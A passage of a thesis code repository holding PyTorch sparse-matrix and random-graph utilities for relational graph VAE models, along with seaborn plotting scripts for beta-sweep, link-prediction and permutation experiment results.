indices = torch.tensor([from_indices, upto_indices], dtype=torch.long, device=d(cuda))
assert indices.size(1) == len(triples)
assert indices[0, :].max() < size[0], f'{indices[0, :].max()}, {size}, {r}'
assert indices[1, :].max() < size[1], f'{indices[1, :].max()}, {size}, {r}'
return indices.t(), size
def adj_triples_tensor(triples, num_nodes, num_rels, vertical=True):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
    :param triples: (num_triples, 3) long tensor of (s, r, o) triples
    :param num_nodes: total number of nodes
    :param num_rels: total number of relations
    :return: sparse tensor indices and size
"""
assert triples.dtype == torch.long
r, n = num_rels, num_nodes
size = (r*n, n) if vertical else (n, r*n)
fr, to = triples[:, 0], triples[:, 2]
offset = triples[:, 1] * n
if vertical:
fr = offset + fr
else:
to = offset + to
indices = torch.cat([fr[:, None], to[:, None]], dim=1)
assert indices.size(0) == triples.size(0)
    assert indices[:, 0].max() < size[0], f'{indices[:, 0].max()}, {size}, {r}'
    assert indices[:, 1].max() < size[1], f'{indices[:, 1].max()}, {size}, {r}'
return indices, size
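# --- Added illustration (editor's sketch): with 3 nodes and 2 relations,
# vertical stacking places relation r's adjacency block at row offset r * n.
def _demo_adj_triples_tensor():
    triples = torch.tensor([[0, 0, 1], [0, 1, 2]], dtype=torch.long)
    indices, size = adj_triples_tensor(triples, num_nodes=3, num_rels=2)
    assert size == (6, 3)                        # (num_rels * n, n)
    assert indices.tolist() == [[0, 1], [3, 2]]  # second triple sits in block r=1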
def sparsemm(use_cuda):
"""
:param use_cuda:
:return:
"""
return SparseMMGPU.apply if use_cuda else SparseMMCPU.apply
class SparseMMCPU(torch.autograd.Function):
"""
Sparse matrix multiplication with gradients over the value-vector
Does not work with batch dim.
"""
@staticmethod
def forward(ctx, indices, values, size, xmatrix):
# print(type(size), size, list(size), intlist(size))
# print(indices.size(), values.size(), torch.Size(intlist(size)))
matrix = torch.sparse.FloatTensor(indices, values, torch.Size(intlist(size)))
ctx.indices, ctx.matrix, ctx.xmatrix = indices, matrix, xmatrix
return torch.mm(matrix, xmatrix)
@staticmethod
def backward(ctx, grad_output):
grad_output = grad_output.data
# -- this will break recursive autograd, but it's the only way to get grad over sparse matrices
i_ixs = ctx.indices[0,:]
j_ixs = ctx.indices[1,:]
output_select = grad_output[i_ixs, :]
xmatrix_select = ctx.xmatrix[j_ixs, :]
grad_values = (output_select * xmatrix_select).sum(dim=1)
grad_xmatrix = torch.mm(ctx.matrix.t(), grad_output)
return None, Variable(grad_values), None, Variable(grad_xmatrix)
class SparseMMGPU(torch.autograd.Function):
"""
Sparse matrix multiplication with gradients over the value-vector
Does not work with batch dim.
"""
@staticmethod
def forward(ctx, indices, values, size, xmatrix):
# print(type(size), size, list(size), intlist(size))
matrix = torch.cuda.sparse.FloatTensor(indices, values, torch.Size(intlist(size)))
ctx.indices, ctx.matrix, ctx.xmatrix = indices, matrix, xmatrix
return torch.mm(matrix, xmatrix)
@staticmethod
def backward(ctx, grad_output):
grad_output = grad_output.data
# -- this will break recursive autograd, but it's the only way to get grad over sparse matrices
i_ixs = ctx.indices[0,:]
j_ixs = ctx.indices[1,:]
output_select = grad_output[i_ixs]
xmatrix_select = ctx.xmatrix[j_ixs]
grad_values = (output_select * xmatrix_select).sum(dim=1)
grad_xmatrix = torch.mm(ctx.matrix.t(), grad_output)
return None, Variable(grad_values), None, Variable(grad_xmatrix)
def spmm(indices, values, size, xmatrix):
cuda = indices.is_cuda
sm = sparsemm(cuda)
return sm(indices.t(), values, size, xmatrix)
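# --- Added illustration (editor's sketch): spmm keeps gradients flowing into
# the sparse value vector, which the stock sparse ops here do not provide.
def _demo_spmm():
    indices = torch.tensor([[0, 0], [1, 1]])  # nonzeros on the diagonal of a 2x2
    values = torch.ones(2, requires_grad=True)
    dense = torch.randn(2, 3)
    out = spmm(indices, values, (2, 2), dense)
    out.sum().backward()
    assert values.grad is not None  # gradient w.r.t. the sparse values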
class Lambda(nn.Module):
def __init__(self, lambd):
super(Lambda, self).__init__()
self.lambd = lambd
def forward(self, x):
return self.lambd(x)
class Debug(nn.Module):
def __init__(self, lambd):
super(Debug, self).__init__()
self.lambd = lambd
def forward(self, x):
self.lambd(x)
return x
def batchmm(indices, values, size, xmatrix, cuda=None):
"""
Multiply a batch of sparse matrices (indices, values, size) with a batch of dense matrices (xmatrix)
:param indices:
:param values:
:param size:
:param xmatrix:
:return:
"""
if cuda is None:
cuda = indices.is_cuda
b, n, r = indices.size()
dv = 'cuda' if cuda else 'cpu'
height, width = size
size = torch.tensor(size, device=dv, dtype=torch.long)
bmult = size[None, None, :].expand(b, n, 2)
m = torch.arange(b, device=dv, dtype=torch.long)[:, None, None].expand(b, n, 2)
bindices = (m * bmult).view(b*n, r) + indices.view(b*n, r)
bfsize = Variable(size * b)
bvalues = values.contiguous().view(-1)
b, w, z = xmatrix.size()
bxmatrix = xmatrix.view(-1, z)
sm = sparsemm(cuda)
result = sm(bindices.t(), bvalues, bfsize, bxmatrix)
return result.view(b, height, -1)
def sum_sparse(indices, values, size, row=True):
"""
Sum the rows or columns of a sparse matrix, and redistribute the
results back to the non-sparse row/column entries
Arguments are interpreted as defining sparse matrix. Any extra dimensions
are treated as batch.
:return:
"""
assert len(indices.size()) == len(values.size()) + 1
if len(indices.size()) == 2:
# add batch dim
indices = indices[None, :, :]
values = values[None, :]
bdims = None
else:
# fold up batch dim
bdims = indices.size()[:-2]
k, r = indices.size()[-2:]
assert bdims == values.size()[:-1]
assert values.size()[-1] == k
indices = indices.view(-1, k, r)
values = values.view(-1, k)
b, k, r = indices.size()
if not row:
# transpose the matrix
indices = torch.cat([indices[:, :, 1:2], indices[:, :, 0:1]], dim=2)
size = size[1], size[0]
ones = torch.ones((size[1], 1), device=d(indices))
s, _ = ones.size()
ones = ones[None, :, :].expand(b, s, 1).contiguous()
# print(indices.size(), values.size(), size, ones.size())
# sys.exit()
sums = batchmm(indices, values, size, ones) # row/column sums
bindex = torch.arange(b, device=d(indices))[:, None].expand(b, indices.size(1))
sums = sums[bindex, indices[:, :, 0], 0]
if bdims is None:
return sums.view(k)
return sums.view(*bdims + (k,))
def intlist(tensor):
"""
A slow and stupid way to turn a tensor into an iterable over ints
:param tensor:
:return:
"""
if type(tensor) is list or type(tensor) is tuple:
return tensor
tensor = tensor.squeeze()
assert len(tensor.size()) == 1
s = tensor.size()[0]
l = [None] * s
for i in range(s):
l[i] = int(tensor[i])
return l
def simple_normalize(indices, values, size, row=True, method='softplus', cuda=torch.cuda.is_available()):
"""
    Simple softmax-style normalization with a choice of positivity function (softplus/abs/relu).
:param indices:
:param values:
:param size:
:param row:
:return:
"""
epsilon = 1e-7
if method == 'softplus':
values = F.softplus(values)
elif method == 'abs':
values = values.abs()
elif method == 'relu':
values = F.relu(values)
else:
raise Exception(f'Method {method} not recognized')
sums = sum_sparse(indices, values, size, row=row)
return (values/(sums + epsilon))
# -- stable(ish) softmax
def logsoftmax(indices, values, size, its=10, p=2, method='iteration', row=True, cuda=torch.cuda.is_available()):
"""
Row or column log-softmaxes a sparse matrix (using logsumexp trick)
:param indices:
:param values:
:param size:
:param row:
:return:
"""
epsilon = 1e-7
if method == 'naive':
values = values.exp()
sums = sum_sparse(indices, values, size, row=row)
return (values/(sums + epsilon)).log()
if method == 'pnorm':
maxes = rowpnorm(indices, values, size, p=p)
elif method == 'iteration':
maxes = itmax(indices, values, size,its=its, p=p)
else:
raise Exception('Max method {} not recognized'.format(method))
mvalues = torch.exp(values - maxes)
    sums = sum_sparse(indices, mvalues, size, row=row)  # row/column sums
return mvalues.log() - sums.log()
def rowpnorm(indices, values, size, p, row=True):
"""
Row or column p-norms a sparse matrix
:param indices:
:param values:
:param size:
:param row:
:return:
"""
pvalues = torch.pow(values, p)
sums = sum_sparse(indices, pvalues, size, row=row)
return torch.pow(sums, 1.0/p)
def itmax(indices, values, size, its=10, p=2, row=True):
"""
Iterative computation of row max
:param indices:
:param values:
:param size:
:param p:
:param row:
:param cuda:
:return:
"""
epsilon = 0.00000001
# create an initial vector with all values made positive
# weights = values - values.min()
weights = F.softplus(values)
weights = weights / (sum_sparse(indices, weights, size) + epsilon)
# iterate, weights converges to a one-hot vector
for i in range(its):
weights = weights.pow(p)
sums = sum_sparse(indices, weights, size, row=row) # row/column sums
weights = weights/sums
return sum_sparse(indices, values * weights, size, row=row)
def schedule(epoch, schedule):
"""
Provides a piecewise linear schedule for some parameter
:param epoch:
:param schedule: Dictionary of integer key and floating point value pairs
:return:
"""
schedule = [(k, v) for k, v in schedule.items()]
schedule = sorted(schedule, key = lambda x : x[0])
for i, (k, v) in enumerate(schedule):
if epoch <= k:
if i == 0:
return v
else:
                # interpolate between i-1 and i
kl, vl = schedule[i-1]
rng = k - kl
prop = (epoch - kl) / rng
propl = 1.0 - prop
return propl * vl + prop * v
return v
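# --- Added illustration (editor's sketch): a piecewise-linear warm-up that
# ramps a weight from 0 to 1 over the first 100 epochs and then holds it.
def _demo_schedule():
    warmup = {0: 0.0, 100: 1.0}
    assert schedule(0, warmup) == 0.0
    assert schedule(50, warmup) == 0.5
    assert schedule(200, warmup) == 1.0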
def contains_nan(input):
if (not isinstance(input, torch.Tensor)) and isinstance(input, Iterable):
for i in input:
if contains_nan(i):
return True
return False
else:
return bool(torch.isnan(input).sum() > 0)
#
def contains_inf(input):
if (not isinstance(input, torch.Tensor)) and isinstance(input, Iterable):
for i in input:
if contains_inf(i):
return True
return False
else:
return bool(torch.isinf(input).sum() > 0)
def block_diag(m):
"""
courtesy of: https://gist.github.com/yulkang/2e4fc3061b45403f455d7f4c316ab168
Make a block diagonal matrix along dim=-3
EXAMPLE:
block_diag(torch.ones(4,3,2))
should give a 12 x 8 matrix with blocks of 3 x 2 ones.
Prepend batch dimensions if needed.
You can also give a list of matrices.
:type m: torch.Tensor, list
:rtype: torch.Tensor
"""
if type(m) is list:
m = torch.cat([m1.unsqueeze(-3) for m1 in m], -3)
dim = m.dim()
n = m.shape[-3]
siz0 = m.shape[:-3]
siz1 = m.shape[-2:]
m2 = m.unsqueeze(-2)
eye = attach_dim(torch.eye(n, device=d(m)).unsqueeze(-2), dim - 3, 1)
return (m2 * eye).reshape(
siz0 + torch.Size(torch.tensor(siz1) * n)
)
def attach_dim(v, n_dim_to_prepend=0, n_dim_to_append=0):
return v.reshape(
torch.Size([1] * n_dim_to_prepend)
+ v.shape
+ torch.Size([1] * n_dim_to_append))
def prod(array):
p = 1
for e in array:
p *= e
return p
def batch(model, *inputs, batch_size=16, **kwargs):
"""
Batch forward.
:param model: multiple input, single output
:param inputs: should all have the same 0 dimension
:return:
"""
n = inputs[0].size(0)
outs = []
for fr in range(0, n, batch_size):
to = min(n, fr + batch_size)
batches = [inp[fr:to] for inp in inputs]
if torch.cuda.is_available():
batches = [btc.cuda() for btc in batches]
outs.append(model(*batches, **kwargs).cpu())
return torch.cat(outs, dim=0)
def get_slug(s):
"""
Returns a simplified version of the given string that can serve as a filename or directory name.
:param s:
:return:
"""
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
```
#### File: rgvae/utils/utils.py
```python
import numpy as np
from scipy.optimize import linear_sum_assignment
import torch
from tqdm import tqdm
def linear_sum_assignment_with_inf(cost_matrix):
"""
scipy linear sum assignment for cost matrices with inf or -inf.
Source: https://github.com/scipy/scipy/issues/6900
"""
cost_matrix = np.asarray(cost_matrix)
min_inf = np.isneginf(cost_matrix).any()
max_inf = np.isposinf(cost_matrix).any()
if min_inf and max_inf:
raise ValueError("matrix contains both inf and -inf")
if min_inf or max_inf:
values = cost_matrix[~np.isinf(cost_matrix)]
m = values.min()
M = values.max()
n = min(cost_matrix.shape)
# strictly positive constant even when added
# to elements of the cost matrix
positive = n * (M - m + np.abs(M) + np.abs(m) + 1)
if max_inf:
place_holder = (M + (n - 1) * (M - m)) + positive
cost_matrix[np.isinf(cost_matrix)] = place_holder
if min_inf:
place_holder = (m + (n - 1) * (m - M)) - positive
cost_matrix[np.isinf(cost_matrix)] = place_holder
return linear_sum_assignment(cost_matrix)
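# --- Added illustration (editor's sketch): np.inf marks a forbidden pairing;
# the helper swaps it for a large finite cost so scipy's minimizer avoids it.
def _demo_lsa_with_inf():
    cost = np.array([[1.0, np.inf], [2.0, 1.0]])
    rows, cols = linear_sum_assignment_with_inf(cost)
    assert list(zip(rows, cols)) == [(0, 0), (1, 1)]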
def no_zero(t):
"""
This function replaces all zeros in a tensor with ones.
This allows us to take the logarithm and then sum over all values in the matrix.
Args:
        t: the tensor whose zeros are replaced
returns:
t: tensor with ones instead of zeros.
"""
t[t==0] = 1.
return t
def check_adj_logic(sample):
"""
    Checks if the generated sample adheres to the logic that edge attributes can only exist where the adjacency matrix indicates an edge.
Args:
sample: A binomial sample of a predicted graph.
Output:
Not sure yet.
"""
A, E, F = sample
E_check = torch.sum(E, -1)
E_check[E_check > 0] = 1.
bool_check = A[A == E_check]
print(A == E_check)
def mk_sparse_graph_ds(n: int, e: int, d_e: int, batch_size: int=1, batches: int=1):
"""
    Function to create a random graph dataset in sparse matrix form.
    We generate each subject (s), relation (r) and object (o) vector separately, then stack and permute them.
    Output shape is [batches*(bs,[s,r,o])].
Args:
n: number of nodes.
e: number of edges between nodes.
d_e: number of edge attributes.
batch_size: well, the batch size.
        batches: number of batches to generate.
"""
ds = list()
for _ in range(batches):
s = np.random.choice(n, (batch_size, e))
r = np.random.choice(d_e, (batch_size, e))
o = np.random.choice(n, (batch_size, e))
ds.append(np.stack([s,r,o], axis=-1))
return ds
def mk_cnstrnd_graph(n: int, e: int, d_e: int, d_n: int, batch_size: int=1, self_loop: bool=False):
"""
Returns a random Graph constrained on the number of nodes and edges.
Args:
n: number of nodes. defines the shape of the adjacency matrix.
e: number of edges, this is the constrain
d_e: number of edge-attributes.
d_n: number of node-attributes.
batch_size: well.. the batch size.
self_loop: Set the diagonal of the adj matrix to one.
"""
lambda_choice = lambda x,y: np.random.choice(x, y, replace=False)
a_choice = np.append(np.ones(e, dtype=int), np.zeros(n*n - e, dtype=int))
A = np.vstack([lambda_choice(a_choice,n*n) for _ in range(batch_size)])
A = A.reshape((batch_size,n,n))
if self_loop:
one_diag = np.eye(n, dtype=int)
one_diag = np.tile(np.expand_dims(one_diag, axis=0), (batch_size, 1, 1))
A = A + one_diag
    # The idea here is that an edge attribute can only exist where an edge is. Further, if there is an edge we want at least one attribute to be 1.
E = np.zeros((batch_size,n,n,d_e), dtype=int)
E[:,:,:,0] = A.copy()
e_choice = np.append(np.ones(d_e, dtype=int), np.zeros(d_e-1, dtype=int))
E[A==1,:] = np.vstack([lambda_choice(e_choice, d_e) for _ in range(batch_size*e)])
f_choice = np.append(np.ones(1, dtype=int), np.zeros(d_n-1, dtype=int))
F = np.eye(d_n)[np.random.choice(d_n,batch_size*n)].reshape((batch_size,n,d_n))
return A, E, F
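# --- Added illustration (editor's sketch): each sampled graph has exactly e
# edges in A, and E carries attributes only where A indicates an edge.
def _demo_mk_cnstrnd_graph():
    A, E, F = mk_cnstrnd_graph(n=4, e=3, d_e=2, d_n=5, batch_size=2)
    assert A.shape == (2, 4, 4) and E.shape == (2, 4, 4, 2) and F.shape == (2, 4, 5)
    assert (A.sum(axis=(1, 2)) == 3).all()  # the edge-count constraint holds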
def mk_random_graph(n: int, d_e: int, d_n: int, batch_size: int=1, target: bool=True):
"""
This function creates a random relation graph.
Consisting of an adjacency, an edge-attribute and a node-attribute matrix.
If we choose to generate a target graph, the graph values are deterministic.
Otherwise we are generating a prediction graph with continuous values.
returns a list of 3 numpy matrices. TODO: F = A + 3rd dim
Args:
n: number of nodes. defines the shape of the adjacency matrix.
d_e: number of edge-attributes.
d_n: number of node-attributes.
batch_size: well.. the batch size.
target: generates a target graph when True, a prediction graph otherwise.
"""
if target:
A = np.random.randint(2, size=(batch_size,n,n))
E = np.random.randint(2, size=(batch_size,n,n,d_e))
F = np.random.randint(2, size=(batch_size,n,d_n))
else:
        A = np.random.normal(size=(batch_size,n,n))
        E = np.random.normal(size=(batch_size,n,n,d_e))
        F = np.random.normal(size=(batch_size,n,d_n))
return (A, E, F)
def mk_graph_ds(n: int, d_e: int, d_n: int, e: int, constrained: bool=True, batches: int=1, batch_size: int=1,target: bool=True):
"""
    Creates a dataset of random graphs, batch by batch.
Args:
n: number of nodes. defines the shape of the adjacency matrix.
e: number of edges, if constrained.
d_e: number of edge-attributes.
d_n: number of node-attributes.
batch_size: well.. the batch size.
target: generates a target graph when True, a prediction graph otherwise.
"""
ds = list()
if constrained:
for i in tqdm(range(batches), desc='Creating Dataset', total=batches):
ds.append(mk_cnstrnd_graph(n,e,d_e,d_n,batch_size))
else:
for i in tqdm(range(batches), desc='Creating Dataset', total=batches):
ds.append(mk_random_graph(n,d_e,d_n,batch_size,target))
return ds
def torch_batch_dot(M1, M2, dim1, dim2):
"""
Torch implementation of the batch dot matrix multiplication.
Only for matrices of shape (bs,n,n,1) and (bs,k,k,1).
Returns matrix of shape (bs,n,n,k,k).
"""
M1_shape = M1.shape
M2_shape = M2.shape
bs = M1_shape[0]
M3 = torch.matmul(M1.view(bs,-1,M1_shape[dim1]), M2.view(bs,M2_shape[dim2],-1)).view(bs,M1_shape[1],M1_shape[2],M2_shape[1],M2_shape[2])
return M3
def torch_batch_dot_v2(M1, M2, dim1, dim2, return_shape):
"""
Torch implementation of the batch dot matrix multiplication.
Args:
return_shape: The shape of the returned matrix, including batch size.
"""
M1_shape = M1.shape
M2_shape = M2.shape
bs = M1_shape[0]
M3 = torch.matmul(M1.view(bs,-1,M1_shape[dim1]), M2.view(bs,M2_shape[dim2],-1)).view(return_shape)
return M3
def replace_nan(t):
"""
    Function to replace NaNs with zeros.
"""
return torch.where(torch.isnan(t), torch.zeros_like(t), t)
def replace_inf(t):
"""
    Function to replace Infs with zeros.
"""
return torch.where(torch.isinf(t), torch.zeros_like(t), t)
def add_e7(t):
"""
Function to add a very small value to each element, to avoid inf errors when taking the logarithm.
"""
return t + torch.ones_like(t) * 1e-7
def sum_sparse(indices, values, size, row_normalisation=True, device='cpu'):
"""
Sum the rows or columns of a sparse matrix, and redistribute the
results back to the non-sparse row/column entries
Arguments are interpreted as defining sparse matrix.
Source: https://github.com/pbloem/gated-rgcn/blob/1bde7f28af8028f468349b2d760c17d5c908b58b/kgmodels/util/util.py#L304
"""
assert len(indices.size()) == len(values.size()) + 1
k, r = indices.size()
if not row_normalisation:
# Transpose the matrix for column-wise normalisation
indices = torch.cat([indices[:, 1:2], indices[:, 0:1]], dim=1)
size = size[1], size[0]
ones = torch.ones((size[1], 1), device=device)
if device == 'cuda':
values = torch.cuda.sparse.FloatTensor(indices.t(), values, torch.Size(size))
else:
values = torch.sparse.FloatTensor(indices.t(), values, torch.Size(size))
sums = torch.spmm(values, ones)
sums = sums[indices[:, 0], 0]
return sums.view(k)
def generate_inverses(triples, num_rels):
""" Generates nverse relations """
# Swap around head and tail. Create new relation ids for inverse relations.
inverse_relations = torch.cat([triples[:, 2, None], triples[:, 1, None] + num_rels, triples[:, 0, None]], dim=1)
assert inverse_relations.size() == triples.size()
return inverse_relations
def generate_self_loops(triples, num_nodes, num_rels, self_loop_keep_prob, device='cpu'):
""" Generates self-loop triples and then applies edge dropout """
# Create a new relation id for self loop relation.
all = torch.arange(num_nodes, device=device)[:, None]
id = torch.empty(size=(num_nodes, 1), device=device, dtype=torch.long).fill_(2*num_rels)
self_loops = torch.cat([all, id, all], dim=1)
assert self_loops.size() == (num_nodes, 3)
# Apply edge dropout
mask = torch.bernoulli(torch.empty(size=(num_nodes,), dtype=torch.float, device=device).fill_(
self_loop_keep_prob)).to(torch.bool)
self_loops = self_loops[mask, :]
return torch.cat([triples, self_loops], dim=0)
def stack_matrices(triples, num_nodes, num_rels, vertical_stacking=True, device='cpu'):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
"""
assert triples.dtype == torch.long
r, n = num_rels, num_nodes
size = (r * n, n) if vertical_stacking else (n, r * n)
fr, to = triples[:, 0], triples[:, 2]
offset = triples[:, 1] * n
if vertical_stacking:
fr = offset + fr
else:
to = offset + to
indices = torch.cat([fr[:, None], to[:, None]], dim=1).to(device)
assert indices.size(0) == triples.size(0)
    assert indices[:, 0].max() < size[0], f'{indices[:, 0].max()}, {size}, {r}'
    assert indices[:, 1].max() < size[1], f'{indices[:, 1].max()}, {size}, {r}'
return indices, size
def block_diag(m):
"""
Source: https://gist.github.com/yulkang/2e4fc3061b45403f455d7f4c316ab168
Make a block diagonal matrix along dim=-3
EXAMPLE:
block_diag(torch.ones(4,3,2))
should give a 12 x 8 matrix with blocks of 3 x 2 ones.
Prepend batch dimensions if needed.
You can also give a list of matrices.
"""
device = 'cuda' if m.is_cuda else 'cpu' # Note: Using cuda status of m as proxy to decide device
if type(m) is list:
m = torch.cat([m1.unsqueeze(-3) for m1 in m], -3)
dim = m.dim()
n = m.shape[-3]
siz0 = m.shape[:-3]
siz1 = m.shape[-2:]
m2 = m.unsqueeze(-2)
eye = attach_dim(torch.eye(n, device=device).unsqueeze(-2), dim - 3, 1)
return (m2 * eye).reshape(
siz0 + torch.Size(torch.tensor(siz1) * n)
)
def attach_dim(v, n_dim_to_prepend=0, n_dim_to_append=0):
return v.reshape(
torch.Size([1] * n_dim_to_prepend)
+ v.shape
+ torch.Size([1] * n_dim_to_append))
``` |
{
"source": "3lLobo/Thesis",
"score": 3
} |
#### File: Thesis/graphs/plot_graph_hyp_bar.py
```python
import matplotlib
import matplotlib.pylab as plt
import os
from matplotlib.pyplot import title
import seaborn as sns
import pandas as pd
def plot_graph(data, metric, plot_name, figsize):
"""
Plot the input data to latex compatible .pgg format.
"""
sns.set()
sns.set_context("paper")
sns.set(rc={'figure.figsize':figsize})
    palette = 'summer'  # alternatives: 'copper_r', 'BuPu', 'afmhot_r', 'cool_r'; see https://medium.com/@morganjonesartist/color-guide-to-seaborn-palettes-da849406d44f
fig, ax = plt.subplots(figsize=figsize)
if metric == 'mrr':
sns.set_theme(style="whitegrid")
g = sns.catplot(data=data, kind="bar", x='beta', y=metric, ci='sd', palette=palette, height=figsize[1], aspect=figsize[0]/figsize[1])
g.despine(left=True)
g.set(ylim=(0, .1))
# sns.barplot(ax=ax, data=data, y=metric, x="beta", palette=palette)
plt.xlabel(r'$\beta$')
plt.ylabel('MRR')
# plt.ylim(0, .1)
# plt.title(t_name.replace('_', ' ').title())
# plt.show()
folder = os.path.dirname(os.path.abspath(__file__)) + '/plots/'
if not os.path.isdir(folder):
os.makedirs(folder)
# plt.savefig(folder + '{}.pgf'.format(plot_name))
plt.savefig(folder + '{}.png'.format(plot_name), bbox_inches='tight')
if __name__ == "__main__":
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
textwidth_in = 6.69423
figsize = [textwidth_in * 0.8, textwidth_in * .5]
for ds in ['fb', 'wn']:
for metric in ['mrr']:
plot_name = 'beta_{}_{}'.format(metric, ds)
beta_list = [0,1,10,100]
df_list = list()
for beta in beta_list:
df_1 = pd.read_csv('graphs/data/beta/beta_{}_all_b{}.csv'.format(ds, beta))
df_1.drop([col for col in df_1.columns if ('__MIN' in col or '__MAX' in col)], axis=1, inplace=True)
col_dict = dict(zip(df_1.columns, ['step','loss','mrr','epoch']))
df_1 = df_1.rename(columns=col_dict)
df_1.fillna(method='bfill', inplace=True)
df_1['beta'] = [str(beta)] * len(df_1)
df_list.append(df_1)
df_plot = pd.concat(df_list, axis=0)
print('Total {}'.format(len(df_plot)))
# df_plot.mrr = df_plot.mrr * 500
# df2.to_csv('beta_plot.csv')
plot_graph(df_plot, metric, plot_name, figsize)
```
#### File: Thesis/graphs/plot_graph_lp.py
```python
import matplotlib
import matplotlib.pylab as plt
import os
import seaborn as sns
import pandas as pd
import itertools
import numpy as np
def plot_graph(data, baseline, plot_name, figsize, legend):
"""
Plot the input data to latex compatible .pgg format.
"""
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
# sns.set()
sns.set_context("paper")
# sns.set(rc={'figure.figsize':figsize})
    palette = 'summer'  # alternatives: 'copper_r', 'BuPu', 'afmhot_r', 'cool_r'; see https://medium.com/@morganjonesartist/color-guide-to-seaborn-palettes-da849406d44f
sns.set_theme(style="whitegrid")
g = sns.catplot(data=data, kind="bar", x='model', y='score', hue="Metric", ci='sd', palette=palette, legend=legend, legend_out=True, height=figsize[1], aspect=figsize[0]/figsize[1])
g.despine(left=True)
g.set(ylim=(0, .1))
g.map(plt.axhline, y=baseline, color='purple', linestyle='dotted')
# plt.legend(loc='upper right', title='Metric')
plt.xlabel('')
plt.ylabel('Score')
# plt.title(t_name.replace('_', ' ').title())
folder = os.path.dirname(os.path.abspath(__file__)) + '/plots/'
if not os.path.isdir(folder):
os.makedirs(folder)
# plt.savefig(folder + '{}.pgf'.format(plot_name))
plt.savefig(folder + '{}{}.png'.format(plot_name, '' if legend else '_wol'), bbox_inches='tight')
if __name__ == "__main__":
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
col_names = ['hits@1','hits@10','hits@3','mrr']
legend = True
for ds in ['fb', 'wn']:
temp_names =['']
df_list = list()
df_plot = pd.DataFrame()
baseline = 0.006
if ds == 'wn':
legend = False
baseline = 0.0015
plot_name = 'lp_{}'.format(ds)
textwidth_in = 6.69423
figsize = [textwidth_in * 0.8, textwidth_in * .5]
for model in ['GVAE', 'GCVAE']:
df_1 = pd.read_csv('graphs/data/LP/lp_{}_{}.csv'.format(model, ds))
df_temp = df_1[[col for col in df_1.columns if '_temp' in col ]]
df_temp.drop([col for col in df_temp.columns if ('__MIN' in col or '__MAX' in col)], axis=1, inplace=True)
std = df_temp.std(axis=0).to_list()
std = np.array(std[-1:]+std[:-1])
df_1.drop([col for col in df_1.columns if ('__MIN' in col or '__MAX' in col or '_temp' in col)], axis=1, inplace=True)
df_1.drop(['Step'], axis=1, inplace=True)
df_1 = df_1.rename(columns=dict(zip(df_1.columns, col_names)))
scale = .5 if ds == 'fb' else .6
for n in [0, scale,-scale]:
df_plot['score'] = np.array(df_1.stack([0]).to_list()) + n*std
df_plot['model'] = ['RGVAE' if model=='GVAE' else 'cRGVAE'] * len(df_plot)
df_plot['Metric'] = col_names
df_list.append(df_plot.copy())
# df_1.fillna(method='bfill', inplace=True)
# df_list.append(df_1.loc([metric]) for metric in col_names)
df_plot = pd.concat(df_list, axis=0)
df_plot.to_csv('graphs/data/LP/lp_{}.csv'.format(ds))
print('Total {}'.format(len(df_plot)))
# df_plot.mrr = df_plot.mrr * 500
# df2.to_csv('beta_plot.csv')
plot_graph(df_plot, baseline, plot_name, figsize, legend)
```
#### File: Thesis/graphs/plot_permute.py
```python
import matplotlib
import matplotlib.pylab as plt
import os
import seaborn as sns
import pandas as pd
import numpy as np
def plot_graph(data, metric, plot_name, figsize, legend):
"""
Plot the input data to latex compatible .pgg format.
"""
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
# sns.set()
sns.set()
sns.set_context("paper")
sns.set(rc={'figure.figsize':figsize})
# sns.set(rc={'figure.figsize':figsize})
    palette = 'summer'  # alternatives: 'copper_r', 'BuPu', 'afmhot_r', 'cool_r'; see https://medium.com/@morganjonesartist/color-guide-to-seaborn-palettes-da849406d44f
fig, ax = plt.subplots(figsize=figsize)
    sns.lineplot(ax=ax, data=data, x='Epoch', y=metric, hue='Model', ci=None, style=r'$\mathcal{L}$', palette=palette, legend=legend)
if legend:
plt.legend(loc='upper right', bbox_to_anchor=(1.33, 1), frameon=False, facecolor='white')
plt.xlabel('Epoch')
plt.ylabel('ELBO' if metric=='loss' else 'Permutation rate')
# g = sns.catplot(data=data, kind="line", x='epoch', y=metric, hue='model', style='$\mathcal{L}$', ci='sd', palette=palette, legend=legend, legend_out=True, height=figsize[1], aspect=figsize[0]/figsize[1])
# g.despine(left=True)
# g.set(ylim=(0, .1))
# g.map(plt.axhline, y=baseline, color='purple', linestyle='dotted')
# plt.legend(loc='upper right', title='Metric')
# plt.title(t_name.replace('_', ' ').title())
folder = os.path.dirname(os.path.abspath(__file__)) + '/plots/'
if not os.path.isdir(folder):
os.makedirs(folder)
# plt.savefig(folder + '{}.pgf'.format(plot_name))
plt.savefig(folder + '{}{}.png'.format(plot_name, '' if legend else '_wol'), bbox_inches='tight')
if __name__ == "__main__":
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
df_1 = pd.read_csv('graphs/data/permute_all.csv')
df_1.fillna(method='bfill', inplace=True)
textwidth_in = 6.69423
figsize = [textwidth_in * 0.8, textwidth_in * .5]
df_1.drop([col for col in df_1.columns if ('__MIN' in col or '__MAX' in col or '_temp' in col)], axis=1, inplace=True)
df_1.drop(['Step'], axis=1, inplace=True)
for metric in ['loss', 'permutation']:
plot_name = 'permute_{}'.format(metric)
df_list = list()
        df_plot = pd.DataFrame(columns=[metric, 'Epoch', 'Model', r'$\mathcal{L}$'])
legend = True if metric=='loss' else False
for model in ['GVAE', 'GCVAE']:
for perm in ['p1','p0']:
df = pd.DataFrame()
cal2keep = [col for col in df_1.columns if (model in col and perm in col)]
m_col = [col for col in cal2keep if metric in col]
df[metric] = df_1[m_col[0]]
df['Model'] = ['RGVAE' if model=='GVAE' else 'cRGVAE'] * len(df)
                df[r'$\mathcal{L}$'] = ['permute' if perm=='p1' else 'standard'] * len(df)
e_col = [col for col in cal2keep if 'epoch' in col]
df['Epoch'] = df_1[e_col[0]]
